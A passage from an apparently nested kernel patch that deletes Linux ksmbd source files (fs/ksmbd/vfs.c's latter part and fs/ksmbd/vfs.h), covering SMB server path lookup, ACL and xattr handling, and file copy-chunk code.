+-	struct ksmbd_readdir_data *buf;
+-	int cmp = -EINVAL;
+-
+-	buf = container_of(ctx, struct ksmbd_readdir_data, ctx);
+-
+-	if (buf->used != namlen)
+-		return true;
+-	if (IS_ENABLED(CONFIG_UNICODE) && buf->um) {
+-		const struct qstr q_buf = {.name = buf->private,
+-					   .len = buf->used};
+-		const struct qstr q_name = {.name = name,
+-					    .len = namlen};
+-
+-		cmp = utf8_strncasecmp(buf->um, &q_buf, &q_name);
+-	}
+-	if (cmp < 0)
+-		cmp = strncasecmp((char *)buf->private, name, namlen);
+-	if (!cmp) {
+-		memcpy((char *)buf->private, name, namlen);
+-		buf->dirent_count = 1;
+-		return false;
+-	}
+-	return true;
+-}
+-
+-/**
+- * ksmbd_vfs_lookup_in_dir() - lookup a file in a directory
+- * @dir:	path info
+- * @name:	filename to lookup
+- * @namelen:	filename length
+- *
+- * Return:	0 on success, otherwise error
+- */
+-static int ksmbd_vfs_lookup_in_dir(const struct path *dir, char *name,
+-				   size_t namelen, struct unicode_map *um)
+-{
+-	int ret;
+-	struct file *dfilp;
+-	int flags = O_RDONLY | O_LARGEFILE;
+-	struct ksmbd_readdir_data readdir_data = {
+-		.ctx.actor	= __caseless_lookup,
+-		.private	= name,
+-		.used		= namelen,
+-		.dirent_count	= 0,
+-		.um		= um,
+-	};
+-
+-	dfilp = dentry_open(dir, flags, current_cred());
+-	if (IS_ERR(dfilp))
+-		return PTR_ERR(dfilp);
+-
+-	ret = iterate_dir(dfilp, &readdir_data.ctx);
+-	if (readdir_data.dirent_count > 0)
+-		ret = 0;
+-	fput(dfilp);
+-	return ret;
+-}
+-
+-/**
+- * ksmbd_vfs_kern_path() - lookup a file and get path info
+- * @name:	file path that is relative to share
+- * @flags:	lookup flags
+- * @path:	if lookup succeed, return path info
+- * @caseless:	caseless filename lookup
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int ksmbd_vfs_kern_path(struct ksmbd_work *work, char *name,
+-			unsigned int flags, struct path *path, bool caseless)
+-{
+-	struct ksmbd_share_config *share_conf = work->tcon->share_conf;
+-	int err;
+-
+-	flags |= LOOKUP_BENEATH;
+-	err = vfs_path_lookup(share_conf->vfs_path.dentry,
+-			      share_conf->vfs_path.mnt,
+-			      name,
+-			      flags,
+-			      path);
+-	if (!err)
+-		return 0;
+-
+-	if (caseless) {
+-		char *filepath;
+-		struct path parent;
+-		size_t path_len, remain_len;
+-
+-		filepath = kstrdup(name, GFP_KERNEL);
+-		if (!filepath)
+-			return -ENOMEM;
+-
+-		path_len = strlen(filepath);
+-		remain_len = path_len;
+-
+-		parent = share_conf->vfs_path;
+-		path_get(&parent);
+-
+-		while (d_can_lookup(parent.dentry)) {
+-			char *filename = filepath + path_len - remain_len;
+-			char *next = strchrnul(filename, '/');
+-			size_t filename_len = next - filename;
+-			bool is_last = !next[0];
+-
+-			if (filename_len == 0)
+-				break;
+-
+-			err = ksmbd_vfs_lookup_in_dir(&parent, filename,
+-						      filename_len,
+-						      work->conn->um);
+-			path_put(&parent);
+-			if (err)
+-				goto out;
+-
+-			next[0] = '\0';
+-
+-			err = vfs_path_lookup(share_conf->vfs_path.dentry,
+-					      share_conf->vfs_path.mnt,
+-					      filepath,
+-					      flags,
+-					      &parent);
+-			if (err)
+-				goto out;
+-			else if (is_last) {
+-				*path = parent;
+-				goto out;
+-			}
+-
+-			next[0] = '/';
+-			remain_len -= filename_len + 1;
+-		}
+-
+-		path_put(&parent);
+-		err = -EINVAL;
+-out:
+-		kfree(filepath);
+-	}
+-	return err;
+-}
+-
+-struct dentry *ksmbd_vfs_kern_path_create(struct ksmbd_work *work,
+-					  const char *name,
+-					  unsigned int flags,
+-					  struct path *path)
+-{
+-	char *abs_name;
+-	struct dentry *dent;
+-
+-	abs_name = convert_to_unix_name(work->tcon->share_conf, name);
+-	if (!abs_name)
+-		return ERR_PTR(-ENOMEM);
+-
+-	dent = kern_path_create(AT_FDCWD, abs_name, path, flags);
+-	kfree(abs_name);
+-	return dent;
+-}
+-
+-int ksmbd_vfs_remove_acl_xattrs(struct user_namespace *user_ns,
+-				struct dentry *dentry)
+-{
+-	char *name, *xattr_list = NULL;
+-	ssize_t xattr_list_len;
+-	int err = 0;
+-
+-	xattr_list_len = ksmbd_vfs_listxattr(dentry, &xattr_list);
+-	if (xattr_list_len < 0) {
+-		goto out;
+-	} else if (!xattr_list_len) {
+-		ksmbd_debug(SMB, "empty xattr in the file\n");
+-		goto out;
+-	}
+-
+-	for (name = xattr_list; name - xattr_list < xattr_list_len;
+-	     name += strlen(name) + 1) {
+-		ksmbd_debug(SMB, "%s, len %zd\n", name, strlen(name));
+-
+-		if (!strncmp(name, XATTR_NAME_POSIX_ACL_ACCESS,
+-			     sizeof(XATTR_NAME_POSIX_ACL_ACCESS) - 1) ||
+-		    !strncmp(name, XATTR_NAME_POSIX_ACL_DEFAULT,
+-			     sizeof(XATTR_NAME_POSIX_ACL_DEFAULT) - 1)) {
+-			err = ksmbd_vfs_remove_xattr(user_ns, dentry, name);
+-			if (err)
+-				ksmbd_debug(SMB,
+-					    "remove acl xattr failed : %s\n", name);
+-		}
+-	}
+-out:
+-	kvfree(xattr_list);
+-	return err;
+-}
+-
+-int ksmbd_vfs_remove_sd_xattrs(struct user_namespace *user_ns,
+-			       struct dentry *dentry)
+-{
+-	char *name, *xattr_list = NULL;
+-	ssize_t xattr_list_len;
+-	int err = 0;
+-
+-	xattr_list_len = ksmbd_vfs_listxattr(dentry, &xattr_list);
+-	if (xattr_list_len < 0) {
+-		goto out;
+-	} else if (!xattr_list_len) {
+-		ksmbd_debug(SMB, "empty xattr in the file\n");
+-		goto out;
+-	}
+-
+-	for (name = xattr_list; name - xattr_list < xattr_list_len;
+-			name += strlen(name) + 1) {
+-		ksmbd_debug(SMB, "%s, len %zd\n", name, strlen(name));
+-
+-		if (!strncmp(name, XATTR_NAME_SD, XATTR_NAME_SD_LEN)) {
+-			err = ksmbd_vfs_remove_xattr(user_ns, dentry, name);
+-			if (err)
+-				ksmbd_debug(SMB, "remove xattr failed : %s\n", name);
+-		}
+-	}
+-out:
+-	kvfree(xattr_list);
+-	return err;
+-}
+-
+-static struct xattr_smb_acl *ksmbd_vfs_make_xattr_posix_acl(struct user_namespace *user_ns,
+-							    struct inode *inode,
+-							    int acl_type)
+-{
+-	struct xattr_smb_acl *smb_acl = NULL;
+-	struct posix_acl *posix_acls;
+-	struct posix_acl_entry *pa_entry;
+-	struct xattr_acl_entry *xa_entry;
+-	int i;
+-
+-	if (!IS_ENABLED(CONFIG_FS_POSIX_ACL))
+-		return NULL;
+-
+-	posix_acls = get_acl(inode, acl_type);
+-	if (!posix_acls)
+-		return NULL;
+-
+-	smb_acl = kzalloc(sizeof(struct xattr_smb_acl) +
+-			  sizeof(struct xattr_acl_entry) * posix_acls->a_count,
+-			  GFP_KERNEL);
+-	if (!smb_acl)
+-		goto out;
+-
+-	smb_acl->count = posix_acls->a_count;
+-	pa_entry = posix_acls->a_entries;
+-	xa_entry = smb_acl->entries;
+-	for (i = 0; i < posix_acls->a_count; i++, pa_entry++, xa_entry++) {
+-		switch (pa_entry->e_tag) {
+-		case ACL_USER:
+-			xa_entry->type = SMB_ACL_USER;
+-			xa_entry->uid = posix_acl_uid_translate(user_ns, pa_entry);
+-			break;
+-		case ACL_USER_OBJ:
+-			xa_entry->type = SMB_ACL_USER_OBJ;
+-			break;
+-		case ACL_GROUP:
+-			xa_entry->type = SMB_ACL_GROUP;
+-			xa_entry->gid = posix_acl_gid_translate(user_ns, pa_entry);
+-			break;
+-		case ACL_GROUP_OBJ:
+-			xa_entry->type = SMB_ACL_GROUP_OBJ;
+-			break;
+-		case ACL_OTHER:
+-			xa_entry->type = SMB_ACL_OTHER;
+-			break;
+-		case ACL_MASK:
+-			xa_entry->type = SMB_ACL_MASK;
+-			break;
+-		default:
+-			pr_err("unknown type : 0x%x\n", pa_entry->e_tag);
+-			goto out;
+-		}
+-
+-		if (pa_entry->e_perm & ACL_READ)
+-			xa_entry->perm |= SMB_ACL_READ;
+-		if (pa_entry->e_perm & ACL_WRITE)
+-			xa_entry->perm |= SMB_ACL_WRITE;
+-		if (pa_entry->e_perm & ACL_EXECUTE)
+-			xa_entry->perm |= SMB_ACL_EXECUTE;
+-	}
+-out:
+-	posix_acl_release(posix_acls);
+-	return smb_acl;
+-}
+-
+-int ksmbd_vfs_set_sd_xattr(struct ksmbd_conn *conn,
+-			   struct user_namespace *user_ns,
+-			   struct dentry *dentry,
+-			   struct smb_ntsd *pntsd, int len)
+-{
+-	int rc;
+-	struct ndr sd_ndr = {0}, acl_ndr = {0};
+-	struct xattr_ntacl acl = {0};
+-	struct xattr_smb_acl *smb_acl, *def_smb_acl = NULL;
+-	struct inode *inode = d_inode(dentry);
+-
+-	acl.version = 4;
+-	acl.hash_type = XATTR_SD_HASH_TYPE_SHA256;
+-	acl.current_time = ksmbd_UnixTimeToNT(current_time(inode));
+-
+-	memcpy(acl.desc, "posix_acl", 9);
+-	acl.desc_len = 10;
+-
+-	pntsd->osidoffset =
+-		cpu_to_le32(le32_to_cpu(pntsd->osidoffset) + NDR_NTSD_OFFSETOF);
+-	pntsd->gsidoffset =
+-		cpu_to_le32(le32_to_cpu(pntsd->gsidoffset) + NDR_NTSD_OFFSETOF);
+-	pntsd->dacloffset =
+-		cpu_to_le32(le32_to_cpu(pntsd->dacloffset) + NDR_NTSD_OFFSETOF);
+-
+-	acl.sd_buf = (char *)pntsd;
+-	acl.sd_size = len;
+-
+-	rc = ksmbd_gen_sd_hash(conn, acl.sd_buf, acl.sd_size, acl.hash);
+-	if (rc) {
+-		pr_err("failed to generate hash for ndr acl\n");
+-		return rc;
+-	}
+-
+-	smb_acl = ksmbd_vfs_make_xattr_posix_acl(user_ns, inode,
+-						 ACL_TYPE_ACCESS);
+-	if (S_ISDIR(inode->i_mode))
+-		def_smb_acl = ksmbd_vfs_make_xattr_posix_acl(user_ns, inode,
+-							     ACL_TYPE_DEFAULT);
+-
+-	rc = ndr_encode_posix_acl(&acl_ndr, user_ns, inode,
+-				  smb_acl, def_smb_acl);
+-	if (rc) {
+-		pr_err("failed to encode ndr to posix acl\n");
+-		goto out;
+-	}
+-
+-	rc = ksmbd_gen_sd_hash(conn, acl_ndr.data, acl_ndr.offset,
+-			       acl.posix_acl_hash);
+-	if (rc) {
+-		pr_err("failed to generate hash for ndr acl\n");
+-		goto out;
+-	}
+-
+-	rc = ndr_encode_v4_ntacl(&sd_ndr, &acl);
+-	if (rc) {
+-		pr_err("failed to encode ndr to posix acl\n");
+-		goto out;
+-	}
+-
+-	rc = ksmbd_vfs_setxattr(user_ns, dentry,
+-				XATTR_NAME_SD, sd_ndr.data,
+-				sd_ndr.offset, 0);
+-	if (rc < 0)
+-		pr_err("Failed to store XATTR ntacl :%d\n", rc);
+-
+-	kfree(sd_ndr.data);
+-out:
+-	kfree(acl_ndr.data);
+-	kfree(smb_acl);
+-	kfree(def_smb_acl);
+-	return rc;
+-}
+-
+-int ksmbd_vfs_get_sd_xattr(struct ksmbd_conn *conn,
+-			   struct user_namespace *user_ns,
+-			   struct dentry *dentry,
+-			   struct smb_ntsd **pntsd)
+-{
+-	int rc;
+-	struct ndr n;
+-	struct inode *inode = d_inode(dentry);
+-	struct ndr acl_ndr = {0};
+-	struct xattr_ntacl acl;
+-	struct xattr_smb_acl *smb_acl = NULL, *def_smb_acl = NULL;
+-	__u8 cmp_hash[XATTR_SD_HASH_SIZE] = {0};
+-
+-	rc = ksmbd_vfs_getxattr(user_ns, dentry, XATTR_NAME_SD, &n.data);
+-	if (rc <= 0)
+-		return rc;
+-
+-	n.length = rc;
+-	rc = ndr_decode_v4_ntacl(&n, &acl);
+-	if (rc)
+-		goto free_n_data;
+-
+-	smb_acl = ksmbd_vfs_make_xattr_posix_acl(user_ns, inode,
+-						 ACL_TYPE_ACCESS);
+-	if (S_ISDIR(inode->i_mode))
+-		def_smb_acl = ksmbd_vfs_make_xattr_posix_acl(user_ns, inode,
+-							     ACL_TYPE_DEFAULT);
+-
+-	rc = ndr_encode_posix_acl(&acl_ndr, user_ns, inode, smb_acl,
+-				  def_smb_acl);
+-	if (rc) {
+-		pr_err("failed to encode ndr to posix acl\n");
+-		goto out_free;
+-	}
+-
+-	rc = ksmbd_gen_sd_hash(conn, acl_ndr.data, acl_ndr.offset, cmp_hash);
+-	if (rc) {
+-		pr_err("failed to generate hash for ndr acl\n");
+-		goto out_free;
+-	}
+-
+-	if (memcmp(cmp_hash, acl.posix_acl_hash, XATTR_SD_HASH_SIZE)) {
+-		pr_err("hash value diff\n");
+-		rc = -EINVAL;
+-		goto out_free;
+-	}
+-
+-	*pntsd = acl.sd_buf;
+-	if (acl.sd_size < sizeof(struct smb_ntsd)) {
+-		pr_err("sd size is invalid\n");
+-		goto out_free;
+-	}
+-
+-	(*pntsd)->osidoffset = cpu_to_le32(le32_to_cpu((*pntsd)->osidoffset) -
+-					   NDR_NTSD_OFFSETOF);
+-	(*pntsd)->gsidoffset = cpu_to_le32(le32_to_cpu((*pntsd)->gsidoffset) -
+-					   NDR_NTSD_OFFSETOF);
+-	(*pntsd)->dacloffset = cpu_to_le32(le32_to_cpu((*pntsd)->dacloffset) -
+-					   NDR_NTSD_OFFSETOF);
+-
+-	rc = acl.sd_size;
+-out_free:
+-	kfree(acl_ndr.data);
+-	kfree(smb_acl);
+-	kfree(def_smb_acl);
+-	if (rc < 0) {
+-		kfree(acl.sd_buf);
+-		*pntsd = NULL;
+-	}
+-
+-free_n_data:
+-	kfree(n.data);
+-	return rc;
+-}
+-
+-int ksmbd_vfs_set_dos_attrib_xattr(struct user_namespace *user_ns,
+-				   struct dentry *dentry,
+-				   struct xattr_dos_attrib *da)
+-{
+-	struct ndr n;
+-	int err;
+-
+-	err = ndr_encode_dos_attr(&n, da);
+-	if (err)
+-		return err;
+-
+-	err = ksmbd_vfs_setxattr(user_ns, dentry, XATTR_NAME_DOS_ATTRIBUTE,
+-				 (void *)n.data, n.offset, 0);
+-	if (err)
+-		ksmbd_debug(SMB, "failed to store dos attribute in xattr\n");
+-	kfree(n.data);
+-
+-	return err;
+-}
+-
+-int ksmbd_vfs_get_dos_attrib_xattr(struct user_namespace *user_ns,
+-				   struct dentry *dentry,
+-				   struct xattr_dos_attrib *da)
+-{
+-	struct ndr n;
+-	int err;
+-
+-	err = ksmbd_vfs_getxattr(user_ns, dentry, XATTR_NAME_DOS_ATTRIBUTE,
+-				 (char **)&n.data);
+-	if (err > 0) {
+-		n.length = err;
+-		if (ndr_decode_dos_attr(&n, da))
+-			err = -EINVAL;
+-		kfree(n.data);
+-	} else {
+-		ksmbd_debug(SMB, "failed to load dos attribute in xattr\n");
+-	}
+-
+-	return err;
+-}
+-
+-/**
+- * ksmbd_vfs_init_kstat() - convert unix stat information to smb stat format
+- * @p:          destination buffer
+- * @ksmbd_kstat:      ksmbd kstat wrapper
+- */
+-void *ksmbd_vfs_init_kstat(char **p, struct ksmbd_kstat *ksmbd_kstat)
+-{
+-	struct file_directory_info *info = (struct file_directory_info *)(*p);
+-	struct kstat *kstat = ksmbd_kstat->kstat;
+-	u64 time;
+-
+-	info->FileIndex = 0;
+-	info->CreationTime = cpu_to_le64(ksmbd_kstat->create_time);
+-	time = ksmbd_UnixTimeToNT(kstat->atime);
+-	info->LastAccessTime = cpu_to_le64(time);
+-	time = ksmbd_UnixTimeToNT(kstat->mtime);
+-	info->LastWriteTime = cpu_to_le64(time);
+-	time = ksmbd_UnixTimeToNT(kstat->ctime);
+-	info->ChangeTime = cpu_to_le64(time);
+-
+-	if (ksmbd_kstat->file_attributes & FILE_ATTRIBUTE_DIRECTORY_LE) {
+-		info->EndOfFile = 0;
+-		info->AllocationSize = 0;
+-	} else {
+-		info->EndOfFile = cpu_to_le64(kstat->size);
+-		info->AllocationSize = cpu_to_le64(kstat->blocks << 9);
+-	}
+-	info->ExtFileAttributes = ksmbd_kstat->file_attributes;
+-
+-	return info;
+-}
+-
+-int ksmbd_vfs_fill_dentry_attrs(struct ksmbd_work *work,
+-				struct user_namespace *user_ns,
+-				struct dentry *dentry,
+-				struct ksmbd_kstat *ksmbd_kstat)
+-{
+-	u64 time;
+-	int rc;
+-
+-	generic_fillattr(user_ns, d_inode(dentry), ksmbd_kstat->kstat);
+-
+-	time = ksmbd_UnixTimeToNT(ksmbd_kstat->kstat->ctime);
+-	ksmbd_kstat->create_time = time;
+-
+-	/*
+-	 * set default value for the case that store dos attributes is not yes
+-	 * or that acl is disable in server's filesystem and the config is yes.
+-	 */
+-	if (S_ISDIR(ksmbd_kstat->kstat->mode))
+-		ksmbd_kstat->file_attributes = FILE_ATTRIBUTE_DIRECTORY_LE;
+-	else
+-		ksmbd_kstat->file_attributes = FILE_ATTRIBUTE_ARCHIVE_LE;
+-
+-	if (test_share_config_flag(work->tcon->share_conf,
+-				   KSMBD_SHARE_FLAG_STORE_DOS_ATTRS)) {
+-		struct xattr_dos_attrib da;
+-
+-		rc = ksmbd_vfs_get_dos_attrib_xattr(user_ns, dentry, &da);
+-		if (rc > 0) {
+-			ksmbd_kstat->file_attributes = cpu_to_le32(da.attr);
+-			ksmbd_kstat->create_time = da.create_time;
+-		} else {
+-			ksmbd_debug(VFS, "fail to load dos attribute.\n");
+-		}
+-	}
+-
+-	return 0;
+-}
+-
+-ssize_t ksmbd_vfs_casexattr_len(struct user_namespace *user_ns,
+-				struct dentry *dentry, char *attr_name,
+-				int attr_name_len)
+-{
+-	char *name, *xattr_list = NULL;
+-	ssize_t value_len = -ENOENT, xattr_list_len;
+-
+-	xattr_list_len = ksmbd_vfs_listxattr(dentry, &xattr_list);
+-	if (xattr_list_len <= 0)
+-		goto out;
+-
+-	for (name = xattr_list; name - xattr_list < xattr_list_len;
+-			name += strlen(name) + 1) {
+-		ksmbd_debug(VFS, "%s, len %zd\n", name, strlen(name));
+-		if (strncasecmp(attr_name, name, attr_name_len))
+-			continue;
+-
+-		value_len = ksmbd_vfs_xattr_len(user_ns, dentry, name);
+-		break;
+-	}
+-
+-out:
+-	kvfree(xattr_list);
+-	return value_len;
+-}
+-
+-int ksmbd_vfs_xattr_stream_name(char *stream_name, char **xattr_stream_name,
+-				size_t *xattr_stream_name_size, int s_type)
+-{
+-	char *type, *buf;
+-
+-	if (s_type == DIR_STREAM)
+-		type = ":$INDEX_ALLOCATION";
+-	else
+-		type = ":$DATA";
+-
+-	buf = kasprintf(GFP_KERNEL, "%s%s%s",
+-			XATTR_NAME_STREAM, stream_name,	type);
+-	if (!buf)
+-		return -ENOMEM;
+-
+-	*xattr_stream_name = buf;
+-	*xattr_stream_name_size = strlen(buf) + 1;
+-
+-	return 0;
+-}
+-
+-int ksmbd_vfs_copy_file_ranges(struct ksmbd_work *work,
+-			       struct ksmbd_file *src_fp,
+-			       struct ksmbd_file *dst_fp,
+-			       struct srv_copychunk *chunks,
+-			       unsigned int chunk_count,
+-			       unsigned int *chunk_count_written,
+-			       unsigned int *chunk_size_written,
+-			       loff_t *total_size_written)
+-{
+-	unsigned int i;
+-	loff_t src_off, dst_off, src_file_size;
+-	size_t len;
+-	int ret;
+-
+-	*chunk_count_written = 0;
+-	*chunk_size_written = 0;
+-	*total_size_written = 0;
+-
+-	if (!(src_fp->daccess & (FILE_READ_DATA_LE | FILE_EXECUTE_LE))) {
+-		pr_err("no right to read(%pD)\n", src_fp->filp);
+-		return -EACCES;
+-	}
+-	if (!(dst_fp->daccess & (FILE_WRITE_DATA_LE | FILE_APPEND_DATA_LE))) {
+-		pr_err("no right to write(%pD)\n", dst_fp->filp);
+-		return -EACCES;
+-	}
+-
+-	if (ksmbd_stream_fd(src_fp) || ksmbd_stream_fd(dst_fp))
+-		return -EBADF;
+-
+-	smb_break_all_levII_oplock(work, dst_fp, 1);
+-
+-	if (!work->tcon->posix_extensions) {
+-		for (i = 0; i < chunk_count; i++) {
+-			src_off = le64_to_cpu(chunks[i].SourceOffset);
+-			dst_off = le64_to_cpu(chunks[i].TargetOffset);
+-			len = le32_to_cpu(chunks[i].Length);
+-
+-			if (check_lock_range(src_fp->filp, src_off,
+-					     src_off + len - 1, READ))
+-				return -EAGAIN;
+-			if (check_lock_range(dst_fp->filp, dst_off,
+-					     dst_off + len - 1, WRITE))
+-				return -EAGAIN;
+-		}
+-	}
+-
+-	src_file_size = i_size_read(file_inode(src_fp->filp));
+-
+-	for (i = 0; i < chunk_count; i++) {
+-		src_off = le64_to_cpu(chunks[i].SourceOffset);
+-		dst_off = le64_to_cpu(chunks[i].TargetOffset);
+-		len = le32_to_cpu(chunks[i].Length);
+-
+-		if (src_off + len > src_file_size)
+-			return -E2BIG;
+-
+-		ret = vfs_copy_file_range(src_fp->filp, src_off,
+-					  dst_fp->filp, dst_off, len, 0);
+-		if (ret == -EOPNOTSUPP || ret == -EXDEV)
+-			ret = vfs_copy_file_range(src_fp->filp, src_off,
+-						  dst_fp->filp, dst_off, len,
+-						  COPY_FILE_SPLICE);
+-		if (ret < 0)
+-			return ret;
+-
+-		*chunk_count_written += 1;
+-		*total_size_written += ret;
+-	}
+-	return 0;
+-}
+-
+-void ksmbd_vfs_posix_lock_wait(struct file_lock *flock)
+-{
+-	wait_event(flock->fl_wait, !flock->fl_blocker);
+-}
+-
+-int ksmbd_vfs_posix_lock_wait_timeout(struct file_lock *flock, long timeout)
+-{
+-	return wait_event_interruptible_timeout(flock->fl_wait,
+-						!flock->fl_blocker,
+-						timeout);
+-}
+-
+-void ksmbd_vfs_posix_lock_unblock(struct file_lock *flock)
+-{
+-	locks_delete_block(flock);
+-}
+-
+-int ksmbd_vfs_set_init_posix_acl(struct user_namespace *user_ns,
+-				 struct inode *inode)
+-{
+-	struct posix_acl_state acl_state;
+-	struct posix_acl *acls;
+-	int rc;
+-
+-	if (!IS_ENABLED(CONFIG_FS_POSIX_ACL))
+-		return -EOPNOTSUPP;
+-
+-	ksmbd_debug(SMB, "Set posix acls\n");
+-	rc = init_acl_state(&acl_state, 1);
+-	if (rc)
+-		return rc;
+-
+-	/* Set default owner group */
+-	acl_state.owner.allow = (inode->i_mode & 0700) >> 6;
+-	acl_state.group.allow = (inode->i_mode & 0070) >> 3;
+-	acl_state.other.allow = inode->i_mode & 0007;
+-	acl_state.users->aces[acl_state.users->n].uid = inode->i_uid;
+-	acl_state.users->aces[acl_state.users->n++].perms.allow =
+-		acl_state.owner.allow;
+-	acl_state.groups->aces[acl_state.groups->n].gid = inode->i_gid;
+-	acl_state.groups->aces[acl_state.groups->n++].perms.allow =
+-		acl_state.group.allow;
+-	acl_state.mask.allow = 0x07;
+-
+-	acls = posix_acl_alloc(6, GFP_KERNEL);
+-	if (!acls) {
+-		free_acl_state(&acl_state);
+-		return -ENOMEM;
+-	}
+-	posix_state_to_acl(&acl_state, acls->a_entries);
+-	rc = set_posix_acl(user_ns, inode, ACL_TYPE_ACCESS, acls);
+-	if (rc < 0)
+-		ksmbd_debug(SMB, "Set posix acl(ACL_TYPE_ACCESS) failed, rc : %d\n",
+-			    rc);
+-	else if (S_ISDIR(inode->i_mode)) {
+-		posix_state_to_acl(&acl_state, acls->a_entries);
+-		rc = set_posix_acl(user_ns, inode, ACL_TYPE_DEFAULT,
+-				   acls);
+-		if (rc < 0)
+-			ksmbd_debug(SMB, "Set posix acl(ACL_TYPE_DEFAULT) failed, rc : %d\n",
+-				    rc);
+-	}
+-	free_acl_state(&acl_state);
+-	posix_acl_release(acls);
+-	return rc;
+-}
+-
+-int ksmbd_vfs_inherit_posix_acl(struct user_namespace *user_ns,
+-				struct inode *inode, struct inode *parent_inode)
+-{
+-	struct posix_acl *acls;
+-	struct posix_acl_entry *pace;
+-	int rc, i;
+-
+-	if (!IS_ENABLED(CONFIG_FS_POSIX_ACL))
+-		return -EOPNOTSUPP;
+-
+-	acls = get_acl(parent_inode, ACL_TYPE_DEFAULT);
+-	if (!acls)
+-		return -ENOENT;
+-	pace = acls->a_entries;
+-
+-	for (i = 0; i < acls->a_count; i++, pace++) {
+-		if (pace->e_tag == ACL_MASK) {
+-			pace->e_perm = 0x07;
+-			break;
+-		}
+-	}
+-
+-	rc = set_posix_acl(user_ns, inode, ACL_TYPE_ACCESS, acls);
+-	if (rc < 0)
+-		ksmbd_debug(SMB, "Set posix acl(ACL_TYPE_ACCESS) failed, rc : %d\n",
+-			    rc);
+-	if (S_ISDIR(inode->i_mode)) {
+-		rc = set_posix_acl(user_ns, inode, ACL_TYPE_DEFAULT,
+-				   acls);
+-		if (rc < 0)
+-			ksmbd_debug(SMB, "Set posix acl(ACL_TYPE_DEFAULT) failed, rc : %d\n",
+-				    rc);
+-	}
+-	posix_acl_release(acls);
+-	return rc;
+-}
+diff --git a/fs/ksmbd/vfs.h b/fs/ksmbd/vfs.h
+deleted file mode 100644
+index 593059ca85112..0000000000000
+--- a/fs/ksmbd/vfs.h
++++ /dev/null
+@@ -1,167 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __KSMBD_VFS_H__
+-#define __KSMBD_VFS_H__
+-
+-#include <linux/file.h>
+-#include <linux/fs.h>
+-#include <linux/namei.h>
+-#include <uapi/linux/xattr.h>
+-#include <linux/posix_acl.h>
+-#include <linux/unicode.h>
+-
+-#include "smbacl.h"
+-#include "xattr.h"
+-
+-/*
+- * Enumeration for stream type.
+- */
+-enum {
+-	DATA_STREAM	= 1,	/* type $DATA */
+-	DIR_STREAM		/* type $INDEX_ALLOCATION */
+-};
+-
+-/* CreateOptions */
+-#define CREATE_TREE_CONNECTION			cpu_to_le32(0x00000080)
+-#define FILE_RESERVE_OPFILTER_LE		cpu_to_le32(0x00100000)
+-
+-#define CREATE_OPTION_READONLY			0x10000000
+-/* system. NB not sent over wire */
+-#define CREATE_OPTION_SPECIAL			0x20000000
+-
+-struct ksmbd_work;
+-struct ksmbd_file;
+-struct ksmbd_conn;
+-
+-struct ksmbd_dir_info {
+-	const char	*name;
+-	char		*wptr;
+-	char		*rptr;
+-	int		name_len;
+-	int		out_buf_len;
+-	int		num_entry;
+-	int		data_count;
+-	int		last_entry_offset;
+-	bool		hide_dot_file;
+-	int		flags;
+-	int		last_entry_off_align;
+-};
+-
+-struct ksmbd_readdir_data {
+-	struct dir_context	ctx;
+-	union {
+-		void		*private;
+-		char		*dirent;
+-	};
+-
+-	unsigned int		used;
+-	unsigned int		dirent_count;
+-	unsigned int		file_attr;
+-	struct unicode_map	*um;
+-};
+-
+-/* ksmbd kstat wrapper to get valid create time when reading dir entry */
+-struct ksmbd_kstat {
+-	struct kstat		*kstat;
+-	unsigned long long	create_time;
+-	__le32			file_attributes;
+-};
+-
+-int ksmbd_vfs_lock_parent(struct user_namespace *user_ns, struct dentry *parent,
+-			  struct dentry *child);
+-int ksmbd_vfs_may_delete(struct user_namespace *user_ns, struct dentry *dentry);
+-int ksmbd_vfs_query_maximal_access(struct user_namespace *user_ns,
+-				   struct dentry *dentry, __le32 *daccess);
+-int ksmbd_vfs_create(struct ksmbd_work *work, const char *name, umode_t mode);
+-int ksmbd_vfs_mkdir(struct ksmbd_work *work, const char *name, umode_t mode);
+-int ksmbd_vfs_read(struct ksmbd_work *work, struct ksmbd_file *fp,
+-		   size_t count, loff_t *pos);
+-int ksmbd_vfs_write(struct ksmbd_work *work, struct ksmbd_file *fp,
+-		    char *buf, size_t count, loff_t *pos, bool sync,
+-		    ssize_t *written);
+-int ksmbd_vfs_fsync(struct ksmbd_work *work, u64 fid, u64 p_id);
+-int ksmbd_vfs_remove_file(struct ksmbd_work *work, char *name);
+-int ksmbd_vfs_link(struct ksmbd_work *work,
+-		   const char *oldname, const char *newname);
+-int ksmbd_vfs_getattr(const struct path *path, struct kstat *stat);
+-int ksmbd_vfs_fp_rename(struct ksmbd_work *work, struct ksmbd_file *fp,
+-			char *newname);
+-int ksmbd_vfs_truncate(struct ksmbd_work *work,
+-		       struct ksmbd_file *fp, loff_t size);
+-struct srv_copychunk;
+-int ksmbd_vfs_copy_file_ranges(struct ksmbd_work *work,
+-			       struct ksmbd_file *src_fp,
+-			       struct ksmbd_file *dst_fp,
+-			       struct srv_copychunk *chunks,
+-			       unsigned int chunk_count,
+-			       unsigned int *chunk_count_written,
+-			       unsigned int *chunk_size_written,
+-			       loff_t  *total_size_written);
+-ssize_t ksmbd_vfs_listxattr(struct dentry *dentry, char **list);
+-ssize_t ksmbd_vfs_getxattr(struct user_namespace *user_ns,
+-			   struct dentry *dentry,
+-			   char *xattr_name,
+-			   char **xattr_buf);
+-ssize_t ksmbd_vfs_casexattr_len(struct user_namespace *user_ns,
+-				struct dentry *dentry, char *attr_name,
+-				int attr_name_len);
+-int ksmbd_vfs_setxattr(struct user_namespace *user_ns,
+-		       struct dentry *dentry, const char *attr_name,
+-		       void *attr_value, size_t attr_size, int flags);
+-int ksmbd_vfs_xattr_stream_name(char *stream_name, char **xattr_stream_name,
+-				size_t *xattr_stream_name_size, int s_type);
+-int ksmbd_vfs_remove_xattr(struct user_namespace *user_ns,
+-			   struct dentry *dentry, char *attr_name);
+-int ksmbd_vfs_kern_path(struct ksmbd_work *work,
+-			char *name, unsigned int flags, struct path *path,
+-			bool caseless);
+-struct dentry *ksmbd_vfs_kern_path_create(struct ksmbd_work *work,
+-					  const char *name,
+-					  unsigned int flags,
+-					  struct path *path);
+-int ksmbd_vfs_empty_dir(struct ksmbd_file *fp);
+-void ksmbd_vfs_set_fadvise(struct file *filp, __le32 option);
+-int ksmbd_vfs_zero_data(struct ksmbd_work *work, struct ksmbd_file *fp,
+-			loff_t off, loff_t len);
